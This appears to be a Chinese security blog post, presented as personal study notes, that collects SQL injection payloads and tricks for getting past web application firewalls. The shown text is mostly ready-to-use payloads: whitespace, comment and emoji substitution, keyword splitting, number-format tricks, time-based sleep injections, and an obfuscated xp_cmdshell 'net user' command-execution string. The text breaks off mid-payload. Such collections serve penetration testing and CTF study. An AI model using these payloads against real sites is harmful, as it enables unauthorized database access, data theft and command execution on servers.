<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="加密文章，仅自用">
<meta property="og:type" content="article">
<meta property="og:title" content="[WAF绕过]SQL注入篇">
<meta property="og:url" content="https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/index.html">
<meta property="og:site_name" content="TonyD0g">
<meta property="og:description" content="加密文章，仅自用">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/02/OP8ZEF.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/10/ONOWvQ.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/10/ONORgg.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/10/ONO4Ds.png">
<meta property="og:image" content="https://s1.ax1x.com/2022/05/10/ONOhuj.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/305162614d7e463997ca10891e59fb20.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAc3VjYzM=,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/d1d07aa0344f4900ac6c139dce6e8e54.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAc3VjYzM=,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="https://img-blog.csdnimg.cn/edd957feac3440e6a96f1443d5b4346b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAc3VjYzM=,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="c:%5CUsers%5CJarvis%5CAppData%5CRoaming%5CTypora%5Ctypora-user-images%5Cimage-20221223090105171.png">
<meta property="article:published_time" content="2022-01-06T07:13:27.000Z">
<meta property="article:modified_time" content="2023-07-27T10:49:58.520Z">
<meta property="article:author" content="TonyD0g">
<meta property="article:tag" content="WAF绕过">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s1.ax1x.com/2022/05/02/OP8ZEF.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>[WAF绕过]SQL注入篇</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/tags/">标签</a></li>
         
          <li><a href="/friends/">friends</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="https://github.com/TonyD0g">项目</a></li>
         
          <li><a href="/search/">搜索</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2022/01/07/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98%E6%B5%85%E8%B0%88%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2022/01/05/%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&text=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&title=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&is_video=false&description=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=[WAF绕过]SQL注入篇&body=Check out this article: https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&title=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&title=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&title=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&title=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&name=[WAF绕过]SQL注入篇&description=&lt;p&gt;加密文章，仅自用&lt;/p&gt;" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://github.com/TonyD0g/2022/01/06/WAF%E7%BB%95%E8%BF%87SQL%E6%B3%A8%E5%85%A5%E7%AF%87/&t=[WAF绕过]SQL注入篇" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#混淆Bypass手段-新花"><span class="toc-number">2.</span> <span class="toc-text">混淆Bypass手段(新花)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#空格过滤绕过"><span class="toc-number">2.0.1.</span> <span class="toc-text">空格过滤绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#关键字匹配绕过-模糊匹配绕过"><span class="toc-number">2.0.2.</span> <span class="toc-text">关键字匹配绕过&#x2F;模糊匹配绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#逗号绕过"><span class="toc-number">2.0.3.</span> <span class="toc-text">逗号绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#冷门函数-字符-运算符绕过"><span class="toc-number">2.0.4.</span> <span class="toc-text">冷门函数&#x2F;字符&#x2F;运算符绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#混淆专题"><span class="toc-number">2.0.5.</span> <span class="toc-text">混淆专题</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#HTTP数据包压缩-编码-文章指路"><span class="toc-number">2.0.6.</span> <span class="toc-text">HTTP数据包压缩&#x2F;编码,文章指路</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#注释符扩展"><span class="toc-number">2.0.7.</span> <span class="toc-text">注释符扩展</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#绕过information-schema"><span class="toc-number">2.0.8.</span> <span class="toc-text">绕过information_schema</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#无列名注入：-建议看原文-提供了各式各样的脚本，可自行魔改"><span class="toc-number">2.0.9.</span> <span class="toc-text">无列名注入：(建议看原文)[提供了各式各样的脚本，可自行魔改]</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#False注入：-建议看原文"><span class="toc-number">2.0.10.</span> <span class="toc-text">False注入：(建议看原文)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#DNS注入"><span class="toc-number">2.0.11.</span> <span class="toc-text">DNS注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#基于BIGINT溢出错误的SQL注入"><span class="toc-number">2.0.12.</span> <span class="toc-text">基于BIGINT溢出错误的SQL注入</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#通用Bypass手段-老树"><span class="toc-number">3.</span> <span class="toc-text">通用Bypass手段(老树)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#请求方式差异规则松懈性绕过"><span class="toc-number">3.0.1.</span> <span class="toc-text">请求方式差异规则松懈性绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#异常-多种Method绕过"><span class="toc-number">3.0.2.</span> <span class="toc-text">异常&#x2F;多种Method绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#脏数据绕过"><span class="toc-number">3.0.3.</span> <span class="toc-text">脏数据绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#参数污染HPP"><span class="toc-number">3.0.4.</span> <span class="toc-text">参数污染HPP:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#协议未覆盖绕过"><span class="toc-number">3.0.5.</span> <span class="toc-text">协议未覆盖绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#宽字节绕过"><span class="toc-number">3.0.6.</span> <span class="toc-text">宽字节绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Cookie-X-Forwarded-For注入绕过"><span class="toc-number">3.0.7.</span> <span class="toc-text">Cookie&#x2F;X-Forwarded-For注入绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#利用pipline绕过"><span class="toc-number">3.0.8.</span> <span class="toc-text">利用pipline绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Transfer-Encoding"><span class="toc-number">3.0.9.</span> <span class="toc-text">Transfer-Encoding</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#各种编码绕过"><span class="toc-number">3.0.10.</span> <span class="toc-text">各种编码绕过:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#白名单"><span class="toc-number">3.0.11.</span> <span class="toc-text">白名单</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#基础"><span class="toc-number">4.</span> <span class="toc-text">基础</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#时间型注入"><span class="toc-number">4.0.1.</span> <span class="toc-text">时间型注入:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#布尔型注入"><span class="toc-number">4.0.2.</span> <span class="toc-text">布尔型注入:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#报错型注入"><span class="toc-number">4.0.3.</span> <span class="toc-text">报错型注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#UA-referer-Get-Post-cookie注入"><span class="toc-number">4.0.4.</span> <span class="toc-text">UA ,referer ,Get&#x2F;Post,cookie注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#联合注入"><span class="toc-number">4.0.5.</span> <span class="toc-text">联合注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#堆叠注入"><span class="toc-number">4.0.6.</span> <span class="toc-text">堆叠注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#编码注入"><span class="toc-number">4.0.7.</span> <span class="toc-text">编码注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#正则注入regexp"><span class="toc-number">4.0.8.</span> <span class="toc-text">正则注入regexp</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Order-by处注入-即末尾注入"><span class="toc-number">4.0.9.</span> <span class="toc-text">Order by处注入(即末尾注入)</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#常用SQL注入命令"><span class="toc-number">4.1.</span> <span class="toc-text">常用SQL注入命令:</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#concat函数"><span class="toc-number">4.2.</span> <span class="toc-text">concat函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Into-outfile"><span class="toc-number">4.3.</span> <span class="toc-text">Into outfile</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#tips"><span class="toc-number">5.</span> <span class="toc-text">tips</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#总结"><span class="toc-number">6.</span> <span class="toc-text">总结:</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#学习来源"><span class="toc-number">6.1.</span> <span class="toc-text">学习来源:</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        [WAF绕过]SQL注入篇
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">TonyD0g</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-01-06T07:13:27.000Z" itemprop="datePublished">2022-01-06</time>
        
        (Updated: <time datetime="2023-07-27T10:49:58.520Z" itemprop="dateModified">2023-07-27</time>)
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/WAF%E7%BB%95%E8%BF%87/" rel="tag">WAF绕过</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>加密文章，仅自用</p>
<a id="more"></a>

<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>SQL注入绕过包罗万象，一篇文章不可能包含所有内容，还需要不断学习其他师傅的经验。<br>虽然一些方法已经失效了，但是背后的思想和方法值得我们学习。建议阅读原文体会作者的思想。<br>本文章只是将其他师傅的文章总结，且个人水平有限，难免有错误和纰漏的地方，望指出。</p>
<p>很喜欢的一句话：<br><code>普世的阳光和真理尚且照不到每一个角落，人为构建出来的工具就更加不可能尽善尽美了</code></p>
<h1 id="混淆Bypass手段-新花"><a href="#混淆Bypass手段-新花" class="headerlink" title="混淆Bypass手段(新花)"></a>混淆Bypass手段(新花)</h1><p><strong><a href="https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt">Fuzz字典链接</a></strong></p>
<p>待研究payload:</p>
<figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">select a from (select <span class="emphasis">* from (select 1 `a`)m join (select 2 `b`)n join (select 3 `c`)t where 0 union select *</span> from table2)x;</span><br><span class="line">混淆版本:</span><br><span class="line">select a from (select <span class="emphasis">* from (select 0x31 a)m join (select 0x32 b)n join (select 0x33 c)t where 0 union select *</span> from table2)x where a=concat(0x31,0x00,0x31);</span><br><span class="line"></span><br><span class="line">select a from (select <span class="emphasis">* from (select @a:=0x31 a)m join (select @b:=0x32 b)n join (select @c:=0x33 c)t where 0 union select *</span> from table2)x where a=(select char(@a,0,@a) from dual);</span><br><span class="line">----------------------------------</span><br><span class="line">select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)</span><br><span class="line">混淆版本:</span><br><span class="line">select min(@a:=0x31) from information_schema.tables group by concat(password,hex(@a:=(@a+0x31)%0x32))</span><br><span class="line">----------------------------------</span><br><span class="line">select !(select * from (select user())x)- ~0</span><br><span class="line"></span><br><span class="line">-1'union SELECT 1,2,IF(SUBSTRING(current,1,1)='s',sleep(1),null) FROM (select database() as current) as tb1%23</span><br><span class="line">混淆版本:</span><br><span class="line">-1'union(select 1,2,if((select substr(database(),1,1))='s',sleep(1),null)from(select database())x)%23</span><br><span class="line"></span><br><span class="line">-1'UNION SELECT 1,2,CASE WHEN LEFT(database(),1)='s' THEN SLEEP(1) ELSE NULL END FROM (SELECT database()) AS tb1%23</span><br><span class="line">----------------------------------</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">[<span class="string">MySQL 注入备忘录</span>](<span class="link">https://xz.aliyun.com/t/12451</span>)</span><br></pre></td></tr></table></figure>



<h3 id="空格过滤绕过"><a href="#空格过滤绕过" class="headerlink" title="空格过滤绕过"></a><strong>空格过滤绕过</strong></h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line">a.使用空白符替换空格绕过:</span><br><span class="line">SQLite3           0A，0D，0C，09，20            </span><br><span class="line">MySQL5            09，0A，0B，0C，0D，A0，20            </span><br><span class="line">PosgresSQL        0A，0D，0C，09，20            </span><br><span class="line">Oracle 11g        00，0A，0D，0C，09，20            </span><br><span class="line">MSSQL             01，02，03，04，05，06，07，08，09，0A，0B，0C，0D，</span><br><span class="line">                  0E，0F，10，11，12，13，14，15，16，17，18，19，1A，</span><br><span class="line">                  1B，1C，1D，1E，1F，20                </span><br><span class="line"></span><br><span class="line">b.使用加号 &#39;+&#39; 替换空格绕过</span><br><span class="line">  使用减号 &#39;-&#39; 替换空格绕过</span><br><span class="line">  使用点号 &#39;.&#39; 替换空格绕过</span><br><span class="line"></span><br><span class="line">c.使用注释符&#x2F;**&#x2F;替换空格绕过</span><br><span class="line"></span><br><span class="line">d.使用圆括号绕过: </span><br><span class="line">例如:</span><br><span class="line">select(username)from(user)where(username)&#x3D;(&#39;user1&#39;)</span><br><span class="line"></span><br><span class="line">e.使用尖括号绕过: &#123;[字母下划线开头，任意长度] [任意长度的数字]&#125;</span><br><span class="line">例如:</span><br><span class="line">id&#x3D;-1 select&#123;x user&#125;from&#123;x mysql.user&#125;</span><br><span class="line">select&#123;x[可填充字符]1&#125;</span><br><span class="line">Mysql中可以利用的空白字符有：</span><br><span class="line">%09,%0a,%0b,%0c,%0d,%20,%a0；</span><br><span class="line">%21 ！ %2b + %2d - %40 @ %7e ~</span><br><span class="line"></span><br><span class="line">id&#x3D;-1 union select 1,&#123;x 2&#125;,3</span><br><span class="line"></span><br><span class="line">f.反引号&#96;&#96;绕过,可以替代空格(反引号&#96;&#96;是为了区分MySQL的保留字和普通字而引入的)</span><br><span class="line">select host,user from user where user&#x3D;&#39;a&#39;union(select&#96;table_name&#96;,&#96;table_type&#96;from&#96;information_schema&#96;.&#96;tables&#96;);</span><br><span class="line"></span><br><span class="line">g.emoji绕过：(空格) &#x3D;&gt;（注释符 emoji 换行）</span><br><span class="line">emoji表情符绕过，示例payload和变形：</span><br><span class="line">-1&#39;%23😀😁😂😃%0aunion select 1,2,database();--+</span><br><span class="line">-1&#39;--+😀😁😂😃%0aunion select 1,2,database();--+</span><br><span class="line">-1&#39;-- 😀😁😂😃%0aunion select 1,2,database();--+</span><br><span class="line"></span><br><span class="line">%23和%0a里可以塞很多，比如 %0~%99 ,除了&#39;#&#39; 和 &#39;&amp;&#39;需要url编码</span><br><span class="line">%23%09%0c%0b%0d%0%99!@$~%^*()_[]|:&#39;&quot;,.&#x2F;%23%26\%0a</span><br><span class="line"></span><br><span class="line">https:&#x2F;&#x2F;github.com&#x2F;Junehck&#x2F;SQL-injection-bypass</span><br><span class="line"></span><br><span class="line">h.</span><br><span class="line">最近一次打CTF遇到的SQL题，都拿了一血（人生第一次，好开心(｡◕ˇ∀ˇ◕)）</span><br><span class="line">emoji绕过的变种:（实测能用，也许实战能过WAF，谁知道呢，到时候研究一波）</span><br><span class="line">%23ðððð%0a</span><br><span class="line">%23Ã°ÂÂÂÃ°ÂÂÂÃ°ÂÂÂÃ°ÂÂÂ%0a</span><br><span class="line">🐎</span><br><span class="line"></span><br><span class="line">i.</span><br><span class="line">--%0a</span><br><span class="line"></span><br><span class="line">j.</span><br><span class="line">1.1e格式,公式:	&#123;任意长度数字&#125;.&#123;任意长度数字&#125;e</span><br><span class="line">--%0a--%0a1.1e--%0a</span><br></pre></td></tr></table></figure>



<h3 id="关键字匹配绕过-模糊匹配绕过"><a href="#关键字匹配绕过-模糊匹配绕过" class="headerlink" title="关键字匹配绕过/模糊匹配绕过"></a><strong>关键字匹配绕过</strong>/模糊匹配绕过</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br></pre></td><td class="code"><pre><span class="line">a.</span><br><span class="line">select  &#x3D;&#x3D;&gt; %S%E%L%C%T 1,2,3</span><br><span class="line"></span><br><span class="line">b.</span><br><span class="line">union select &#x3D;&#x3D;&gt; (UnI)(oN)+(SeL)(EcT)</span><br><span class="line"></span><br><span class="line">c.</span><br><span class="line">union select database() &#x3D;&#x3D;&gt; union..select+database() &#x3D;&#x3D;&gt; &#39;un&#39;+&#39;ion..se&#39;+&#39;le&#39;+&#39;ct&#39;+&#39;+dat&quot;abase()&quot;&#39; </span><br><span class="line"></span><br><span class="line">d.</span><br><span class="line">1.aspx?id&#x3D;1;EXEC(‘ma’+&#39;ster..x’+&#39;p_cm’+&#39;dsh’+&#39;ell ”net user”’)</span><br><span class="line"></span><br><span class="line">e.</span><br><span class="line">id&#x3D;-1 select&#123;x user&#125;from&#123;x mysql.user&#125;</span><br><span class="line"></span><br><span class="line">可以穿插一些%0a,%0b,%0c,%0d等去混淆</span><br><span class="line"></span><br><span class="line">f.</span><br><span class="line">浮点数形式：</span><br><span class="line">SELECT * FROM admin WHERE username &#x3D; 1.0union select 1,user() from admin</span><br><span class="line">SELECT * FROM admin WHERE username &#x3D; 1.union select 1,user() from admin</span><br><span class="line">其他形式如：%1%2e、%2%2e</span><br><span class="line"></span><br><span class="line">g.</span><br><span class="line">科学计数法的形式：</span><br><span class="line">SELECT * FROM admin WHERE username &#x3D; 1E0union select 1,user() from admin</span><br><span class="line"></span><br><span class="line">h.</span><br><span class="line">\Nunion的形式：</span><br><span class="line">SELECT * FROM admin WHERE username &#x3D; \Nunion select 1,user() from admin</span><br><span class="line"></span><br><span class="line">i.</span><br><span class="line">  使用 &#39;+&#39;  号 替换空格绕过：select+user</span><br><span class="line">  使用 &#39;-&#39;  号 替换空格绕过：select-user</span><br><span class="line">  使用 &#39;@&#39;  号 替换空格绕过：select@user</span><br><span class="line">  使用 &#39;!&#39;    号替换空格绕过：select!user</span><br><span class="line">  使用 &#39;&#39;&#39;    号 替换空格绕过：select&#39;user&#39;</span><br><span class="line">  使用 &#39;&quot;&#39;   号替换空格绕过：select&quot;user&quot;</span><br><span class="line">  使用 &#39;~&#39;  号 替换空格绕过：select~user</span><br><span class="line"> </span><br><span class="line"> j.</span><br><span class="line">  玩了一下 阿里的SQL注入挑战赛，总结的骚套路：</span><br><span class="line">  一。此处的sleep可替换为其他函数,但是并不能执行(注意‘#’要转为%23,否则不能用),两个payload</span><br><span class="line">  1%27orDer%0a%0dBy %0a%0dsleep%0a%0c(100)%23%31%27%27%2d%2d%20%20%20%2b</span><br><span class="line">  </span><br><span class="line">  1%27%20orDer%0a%0dBy%20%0a%0dsleep%0a%0c(1)--+%31%27%27%2d%2d%20%20%20%2b</span><br><span class="line">  </span><br><span class="line">  二。将order by 的顺序改到后面去，前面放置主payload</span><br><span class="line">  -1%27regexp&quot;[...%0a%23]&quot;or %23%09\%0aif%0a%0c(0,0,pi())  orDer%0a%0dBy floor%0a%0c(1)%23%31%27%27%2d%2d%20%20%20%2b</span><br><span class="line">  </span><br><span class="line">  -1%27regexp&quot;[...%0a%23]&quot;or --%0a1.1e--%0a--+%09%0c%0b%0d%0%99!@$~%^*()_[]|:&#39;&quot;,.&#x2F;%26\%0aif%0a%0c(0,0,pi())  orDer%0a%0dBy floor%0a%0c(1)--+%31%27%27%2d%2d%20%20%20%2b</span><br><span class="line">  </span><br><span class="line">  三。加一些混淆</span><br><span class="line">  -1%27regexp&quot;[...%0a%23benchmark]&quot;or 